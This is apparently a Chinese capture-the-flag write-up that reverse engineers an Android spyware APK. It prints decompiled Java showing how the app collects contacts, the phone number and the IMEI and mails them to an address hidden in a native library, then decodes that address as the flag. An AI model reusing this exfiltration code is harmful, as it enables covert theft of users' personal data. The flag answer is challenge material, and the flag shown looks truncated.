jadx-gui打开

下载后的文件是以 ".apk" 结尾，因此使用jadx-gui打开。

根据题目提示，搜索关键字mail。

选择第一行，点击转到。

public static int sendMailByJavaMail(String mailto, String title, String mailmsg) {if (!debug) {Mail m = new Mail(C2.MAILUSER, C2.MAILPASS);m.set_host(C2.MAILHOST);m.set_port(C2.PORT);m.set_debuggable(true);m.set_to(new String[]{mailto});m.set_from(C2.MAILFROME);m.set_subject(title);m.setBody(mailmsg);try {if (m.send()) {Log.i("IcetestActivity", "Email was sent successfully.");} else {Log.i("IcetestActivity", "Email was sent failed.");}} catch (Exception e) {Log.e("MailApp", "Could not send email", e);}}return 1;}

根据sendMailByJavaMail()方法中参数列表所要传的数据来看，这就是关键。

再次搜索看看谁调用了sendMailByJavaMail()这个方法

选第2行，转到。

public void run(String content2) {String notebooks = "";for (String[] note : NoteBook.get(this.context, IMAPStore.RESPONSE)) {notebooks = String.valueOf(notebooks) + note[0] + ":" + note[1] + "\r\n";}String tel = ((TelephonyManager) this.context.getSystemService("phone")).getLine1Number();if (tel == null || tel.equals("")) {tel = A2.getNoteBook(content2).phoneNumber;}A2.getNoteBook(content2);if (!A2.isEmpty(notebooks)) {A2.sendMailByJavaMail(C2.MAILSERVER, "通讯录(" + tel + "IMEI" + ((TelephonyManager) this.context.getSystemService("phone")).getDeviceId() + ")", notebooks);}}

发现有个MAILSERVER，右键 "跳到声明"

public static final String CANCELNUMBER = "%23%2321%23";public static final String MAILFROME = Base64.decode(NativeMethod.m());public static final String MAILHOST = "";public static final String MAILPASS = Base64.decode(NativeMethod.pwd());public static final String MAILSERVER = Base64.decode(NativeMethod.m());public static final String MAILUSER = Base64.decode(NativeMethod.m());public static final String MOVENUMBER = "**21*121%23";public static final String PORT = "25";public static final String date = "2115-11-1";public static final String phoneNumber = Base64.decode(NativeMethod.p());

发现NativeMethod的m经过Base64加密。

MAILSERVER就是加载外部so文件中NativeMethod.m1m()函数所返回的值，再进行base64解密。因此我们只需要找到so文件中经过base64加密的字符串。

IDA打开

选择 "lib/armeabi/libcore.so"，OK。

Shift + F12

双击 "MTgyMTg0NjUxMjVAMTYzLmNvbQ=="

再找到由Base64加密的字符串："MTgyMTg0NjUxMjVAMTYzLmNvbQ=="

通过Base64解码得到flag{18218465125@}